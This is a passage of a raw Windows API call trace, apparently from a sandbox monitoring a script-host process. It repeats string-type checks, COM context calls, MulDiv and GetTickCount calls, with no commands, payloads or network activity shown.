dwInfoType=0x1, lpSrcStr="Ë", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.371] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="ò", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.371] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="¡", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.372] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="«", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.372] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="ì", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.372] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="ï", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.373] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x98", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.374] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="þ", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.374] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fa270 | out: ppv=0xd6788fa270*=0x24adf97e528) returned 0x0 [0102.375] MulDiv (nNumber=1019, nNumerator=100, nDenominator=2661) returned 38 [0102.375] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.375] GetTickCount () returned 0x210d931 [0102.376] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="Ü", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.376] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x99", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.378] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="¥", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.380] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x96", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.381] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fae80 | out: ppv=0xd6788fae80*=0x24adf97e528) returned 0x0 [0102.382] MulDiv (nNumber=1022, nNumerator=100, nDenominator=2673) returned 38 [0102.382] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.383] GetTickCount () returned 0x210d941 [0102.383] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x83", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.384] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x9a", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.384] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x9c", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.386] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="µ", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.387] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="¸", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.388] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="Û", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.389] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="Ö", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.389] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fa270 | out: ppv=0xd6788fa270*=0x24adf97e528) returned 0x0 [0102.390] MulDiv (nNumber=1003, nNumerator=100, nDenominator=2675) returned 37 [0102.390] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.390] GetTickCount () returned 0x210d941 [0102.391] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x83", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.391] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="¦", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.391] GetTickCount () returned 0x210d941 [0102.391] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x87", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.392] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="®", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.392] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x8e", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.395] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="¾", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.396] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fa270 | out: ppv=0xd6788fa270*=0x24adf97e528) returned 0x0 [0102.397] MulDiv (nNumber=1017, nNumerator=100, nDenominator=2696) returned 38 [0102.397] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.397] GetTickCount () returned 0x210d950 [0102.398] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="´", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.398] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="¿", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.399] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x92", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.400] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x98", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.400] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="ª", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.403] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fae80 | out: ppv=0xd6788fae80*=0x24adf97e528) returned 0x0 [0102.404] MulDiv (nNumber=1000, nNumerator=100, nDenominator=2707) returned 37 [0102.404] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.404] GetTickCount () returned 0x210d950 [0102.404] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="Ü", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.405] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x89", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.413] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fae80 | out: ppv=0xd6788fae80*=0x24adf97e528) returned 0x0 [0102.414] MulDiv (nNumber=1011, nNumerator=100, nDenominator=2731) returned 37 [0102.414] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.414] GetTickCount () returned 0x210d960 [0102.414] GetTickCount () returned 0x210d960 [0102.419] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fbd00 | out: ppv=0xd6788fbd00*=0x24adf97e528) returned 0x0 [0102.420] MulDiv (nNumber=1027, nNumerator=100, nDenominator=2745) returned 37 [0102.420] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.420] GetTickCount () returned 0x210d960 [0102.430] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fa270 | out: ppv=0xd6788fa270*=0x24adf97e528) returned 0x0 [0102.430] MulDiv (nNumber=1002, nNumerator=100, nDenominator=2743) returned 37 [0102.430] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.431] GetTickCount () returned 0x210d96f [0102.435] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fa270 | out: ppv=0xd6788fa270*=0x24adf97e528) returned 0x0 [0102.435] MulDiv (nNumber=1004, nNumerator=100, nDenominator=2768) returned 36 [0102.435] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.435] GetTickCount () returned 0x210d96f [0102.443] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fae80 | out: ppv=0xd6788fae80*=0x24adf97e528) returned 0x0 [0102.444] MulDiv (nNumber=1014, nNumerator=100, nDenominator=2790) returned 36 [0102.444] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.444] GetTickCount () returned 0x210d97f [0102.449] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fa270 | out: ppv=0xd6788fa270*=0x24adf97e528) returned 0x0 [0102.449] MulDiv (nNumber=1022, nNumerator=100, nDenominator=2804) returned 36 [0102.449] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.449] GetTickCount () returned 0x210d97f [0102.453] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fa270 | out: ppv=0xd6788fa270*=0x24adf97e528) returned 0x0 [0102.455] MulDiv (nNumber=999, nNumerator=100, nDenominator=2813) returned 36 [0102.455] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.455] GetTickCount () returned 0x210d97f [0102.470] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fae80 | out: ppv=0xd6788fae80*=0x24adf97e528) returned 0x0 [0102.471] MulDiv (nNumber=1022, nNumerator=100, nDenominator=2841) returned 36 [0102.471] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.471] GetTickCount () returned 0x210d98f [0102.471] GetTickCount () returned 0x210d98f [0102.497] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fa270 | out: ppv=0xd6788fa270*=0x24adf97e528) returned 0x0 [0102.498] MulDiv (nNumber=1005, nNumerator=100, nDenominator=2849) returned 35 [0102.498] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.498] GetTickCount () returned 0x210d9be [0102.504] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fa270 | out: ppv=0xd6788fa270*=0x24adf97e528) returned 0x0 [0102.505] MulDiv (nNumber=1025, nNumerator=100, nDenominator=2875) returned 36 [0102.506] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.506] GetTickCount () returned 0x210d9be [0102.518] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fa270 | out: ppv=0xd6788fa270*=0x24adf97e528) returned 0x0 [0102.519] MulDiv (nNumber=1018, nNumerator=100, nDenominator=2880) returned 35 [0102.519] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.519] GetTickCount () returned 0x210d9cd [0102.525] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fa270 | out: ppv=0xd6788fa270*=0x24adf97e528) returned 0x0 [0102.526] MulDiv (nNumber=1011, nNumerator=100, nDenominator=2887) returned 35 [0102.526] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.526] GetTickCount () returned 0x210d9cd [0102.526] GetTickCount () returned 0x210d9cd [0102.529] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fae80 | out: ppv=0xd6788fae80*=0x24adf97e528) returned 0x0 [0102.529] MulDiv (nNumber=1020, nNumerator=100, nDenominator=2900) returned 35 [0102.529] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.529] GetTickCount () returned 0x210d9cd [0102.534] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fae80 | out: ppv=0xd6788fae80*=0x24adf97e528) returned 0x0 [0102.539] MulDiv (nNumber=1001, nNumerator=100, nDenominator=2904) returned 34 [0102.539] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.539] GetTickCount () returned 0x210d9dd [0102.542] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fa270 | out: ppv=0xd6788fa270*=0x24adf97e528) returned 0x0 [0102.543] MulDiv (nNumber=1007, nNumerator=100, nDenominator=2929) returned 34 [0102.543] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.543] GetTickCount () returned 0x210d9dd [0102.547] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fa270 | out: ppv=0xd6788fa270*=0x24adf97e528) returned 0x0 [0102.547] MulDiv (nNumber=1016, nNumerator=100, nDenominator=2952) returned 34 [0102.547] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.547] GetTickCount () returned 0x210d9dd [0102.552] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fa270 | out: ppv=0xd6788fa270*=0x24adf97e528) returned 0x0 [0102.553] MulDiv (nNumber=1010, nNumerator=100, nDenominator=2962) returned 34 [0102.553] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.553] GetTickCount () returned 0x210d9ec [0102.557] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fa270 | out: ppv=0xd6788fa270*=0x24adf97e528) returned 0x0 [0102.557] MulDiv (nNumber=1016, nNumerator=100, nDenominator=2976) returned 34 [0102.557] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.557] GetTickCount () returned 0x210d9ec [0102.561] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fa270 | out: ppv=0xd6788fa270*=0x24adf97e528) returned 0x0 [0102.562] MulDiv (nNumber=1000, nNumerator=100, nDenominator=2988) returned 33 [0102.562] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.562] GetTickCount () returned 0x210d9ec [0102.570] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fae80 | out: ppv=0xd6788fae80*=0x24adf97e528) returned 0x0 [0102.570] MulDiv (nNumber=1028, nNumerator=100, nDenominator=3012) returned 34 [0102.570] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.570] GetTickCount () returned 0x210d9fc [0102.575] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fae80 | out: ppv=0xd6788fae80*=0x24adf97e528) returned 0x0 [0102.575] free (_Block=0x24ae148c020) [0102.575] MulDiv (nNumber=1011, nNumerator=100, nDenominator=3008) returned 34 [0102.575] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.575] GetTickCount () returned 0x210d9fc [0102.581] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fae80 | out: ppv=0xd6788fae80*=0x24adf97e528) returned 0x0 [0102.581] MulDiv (nNumber=1001, nNumerator=100, nDenominator=3027) returned 33 [0102.581] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.581] GetTickCount () returned 0x210da0c [0102.586] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fbd00 | out: ppv=0xd6788fbd00*=0x24adf97e528) returned 0x0 [0102.586] MulDiv (nNumber=1030, nNumerator=100, nDenominator=3050) returned 34 [0102.586] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.586] GetTickCount () returned 0x210da0c [0102.588] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fa270 | out: ppv=0xd6788fa270*=0x24adf97e528) returned 0x0 [0102.588] MulDiv (nNumber=1004, nNumerator=100, nDenominator=3044) returned 33 [0102.588] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.589] GetTickCount () returned 0x210da0c [0102.589] GetTickCount () returned 0x210da0c [0102.591] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fa270 | out: ppv=0xd6788fa270*=0x24adf97e528) returned 0x0 [0102.591] MulDiv (nNumber=1011, nNumerator=100, nDenominator=3069) returned 33 [0102.591] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.591] GetTickCount () returned 0x210da0c [0102.593] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fbd00 | out: ppv=0xd6788fbd00*=0x24adf97e528) returned 0x0 [0102.594] MulDiv (nNumber=1017, nNumerator=100, nDenominator=3082) returned 33 [0102.594] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.594] GetTickCount () returned 0x210da0c [0102.601] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fae80 | out: ppv=0xd6788fae80*=0x24adf97e528) returned 0x0 [0102.601] MulDiv (nNumber=1002, nNumerator=100, nDenominator=3090) returned 32 [0102.601] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.601] GetTickCount () returned 0x210da1b [0102.603] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fae80 | out: ppv=0xd6788fae80*=0x24adf97e528) returned 0x0 [0102.603] MulDiv (nNumber=1016, nNumerator=100, nDenominator=3112) returned 33 [0102.604] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.604] GetTickCount () returned 0x210da1b [0102.604] GetTickCount () returned 0x210da1b [0102.606] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fa270 | out: ppv=0xd6788fa270*=0x24adf97e528) returned 0x0 [0102.606] MulDiv (nNumber=994, nNumerator=100, nDenominator=3124) returned 32 [0102.606] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.606] GetTickCount () returned 0x210da1b [0102.608] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fbd00 | out: ppv=0xd6788fbd00*=0x24adf97e528) returned 0x0 [0102.608] MulDiv (nNumber=1035, nNumerator=100, nDenominator=3155) returned 33 [0102.608] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.609] GetTickCount () returned 0x210da1b [0102.610] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fae80 | out: ppv=0xd6788fae80*=0x24adf97e528) returned 0x0 [0102.611] MulDiv (nNumber=997, nNumerator=100, nDenominator=3145) returned 32 [0102.611] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.611] GetTickCount () returned 0x210da1b [0102.620] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fae80 | out: ppv=0xd6788fae80*=0x24adf97e528) returned 0x0 [0102.621] MulDiv (nNumber=1016, nNumerator=100, nDenominator=3173) returned 32 [0102.621] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.621] GetTickCount () returned 0x210da2b [0102.623] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fae80 | out: ppv=0xd6788fae80*=0x24adf97e528) returned 0x0 [0102.623] MulDiv (nNumber=976, nNumerator=100, nDenominator=3184) returned 31 [0102.623] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.623] GetTickCount () returned 0x210da2b [0102.624] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fa270 | out: ppv=0xd6788fa270*=0x24adf97e528) returned 0x0 [0102.625] MulDiv (nNumber=1051, nNumerator=100, nDenominator=3237) returned 32 [0102.625] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.625] GetTickCount () returned 0x210da2b [0102.625] _wcsicmp (_String1="WScript", _String2="WScript") returned 0 [0102.630] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fba90 | out: ppv=0xd6788fba90*=0x24adf97e528) returned 0x0 [0102.630] free (_Block=0x24ae189b1c0) [0102.630] free (_Block=0x24ae189b5e0) [0102.630] MulDiv (nNumber=996, nNumerator=100, nDenominator=3210) returned 31 [0102.630] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.631] GetTickCount () returned 0x210da3b [0102.634] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fae80 | out: ppv=0xd6788fae80*=0x24adf97e528) returned 0x0 [0102.634] MulDiv (nNumber=946, nNumerator=100, nDenominator=3240) returned 29 [0102.634] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.634] GetTickCount () returned 0x210da3b [0102.637] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fd520 | out: ppv=0xd6788fd520*=0x24adf97e528) returned 0x0 [0102.638] MulDiv (nNumber=966, nNumerator=100, nDenominator=3320) returned 29 [0102.638] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.638] GetTickCount () returned 0x210da3b [0102.641] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fba90 | out: ppv=0xd6788fba90*=0x24adf97e528) returned 0x0 [0102.641] MulDiv (nNumber=927, nNumerator=100, nDenominator=3380) returned 27 [0102.642] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.642] GetTickCount () returned 0x210da3b [0102.649] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fba90 | out: ppv=0xd6788fba90*=0x24adf97e528) returned 0x0 [0102.649] MulDiv (nNumber=956, nNumerator=100, nDenominator=3479) returned 27 [0102.649] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.649] GetTickCount () returned 0x210da4a [0102.652] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fae80 | out: ppv=0xd6788fae80*=0x24adf97e528) returned 0x0 [0102.652] MulDiv (nNumber=956, nNumerator=100, nDenominator=3551) returned 27 [0102.652] IUnknown:Release (This=0x24adf97e528) returned 